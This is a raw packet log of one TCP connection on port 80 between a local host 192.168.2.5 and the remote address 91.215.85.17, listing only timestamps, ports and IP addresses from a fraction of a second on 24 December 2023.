Dec 24, 2023 10:44:21.134893894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.134931087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.134968996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.134979963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135065079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135102987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135180950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135262012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135303020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135304928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135360003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135374069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135410070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135490894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135507107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135540962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135579109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135618925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135638952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135690928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135740995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135754108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135799885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135837078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.135863066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135926962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135967016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.135971069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136023045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136073112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136112928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136112928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136195898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136210918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136241913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136250973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136276960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136342049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136390924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136431932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136467934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136516094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136563063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136580944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136622906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136627913 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136671066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136713982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136755943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136812925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136861086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.136882067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136931896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.136976957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137017965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137034893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137084007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137123108 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137142897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137231112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137270927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137291908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137332916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137362003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137443066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137511969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137533903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137598991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137644053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137670994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137713909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137777090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137819052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137830973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137866020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137909889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137936115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.137976885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.137993097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138042927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138089895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138114929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138176918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138216972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138228893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138281107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138359070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138396978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138427019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138463974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138504028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138564110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138614893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138653040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138664007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138693094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138731003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138750076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138789892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138818026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138880014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138922930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.138926029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.138992071 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139076948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139120102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139213085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139260054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139275074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139302015 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139313936 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139348030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139381886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139458895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139502048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139518023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139604092 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139645100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139646053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139683962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139692068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139755011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139806986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139847040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.139861107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139931917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.139996052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140022039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140036106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140100002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140114069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140156984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140176058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140212059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140249968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140305042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140320063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140363932 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140398979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140466928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140512943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140538931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140566111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140604973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140645027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140677929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140727997 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140733957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140779018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140826941 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140842915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140908957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140945911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.140986919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.140989065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141041994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141043901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141103029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141191959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141232014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141242027 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141292095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141355991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141360998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141443014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141489983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141510963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141554117 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141556025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141617060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141666889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141686916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141756058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141807079 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141809940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141853094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141897917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.141906023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.141953945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142024994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142025948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142092943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142131090 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142147064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142210007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142241001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142294884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142312050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142379045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142406940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142467022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142518044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142522097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142560005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142607927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142632008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142678976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142724037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142729044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142796040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142838001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142855883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.142880917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142944098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142992973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.142999887 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143008947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143063068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143086910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143131018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143157005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143197060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143256903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143270969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143382072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143423080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143431902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143481970 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143531084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143614054 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143619061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143675089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143701077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143785000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143824100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.143835068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143877029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143938065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.143951893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144011974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144048929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144068003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144113064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144157887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144170046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144200087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144239902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144265890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144301891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144357920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144376993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144395113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144443989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144469976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144527912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144570112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144572973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144656897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144712925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144761086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144802094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144856930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.144901991 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.144942045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145055056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145078897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145136118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145175934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145200968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145292997 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145333052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145339012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145397902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145459890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145510912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145524025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145525932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145553112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145581007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145622969 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145642996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145700932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145746946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.145777941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145863056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145937920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.145941019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146023035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146066904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146091938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146132946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146147013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146171093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146207094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146258116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146284103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146330118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146379948 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146388054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146441936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146487951 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146500111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146570921 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146620035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146622896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146694899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146738052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146739006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146800995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146835089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146867990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.146924973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.146986008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147058964 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147070885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147113085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147134066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147229910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147273064 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147295952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147320032 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147356987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147367954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147432089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147479057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147495031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147524118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147567987 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147600889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147670031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147682905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147708893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147761106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147818089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147824049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147880077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147893906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.147922993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.147974014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148016930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.148041964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148092985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148128986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.148133039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148189068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148232937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.148256063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148302078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:21.148367882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:21.148375988 CET	80	49716	91.215.85.17	192.168.2.5
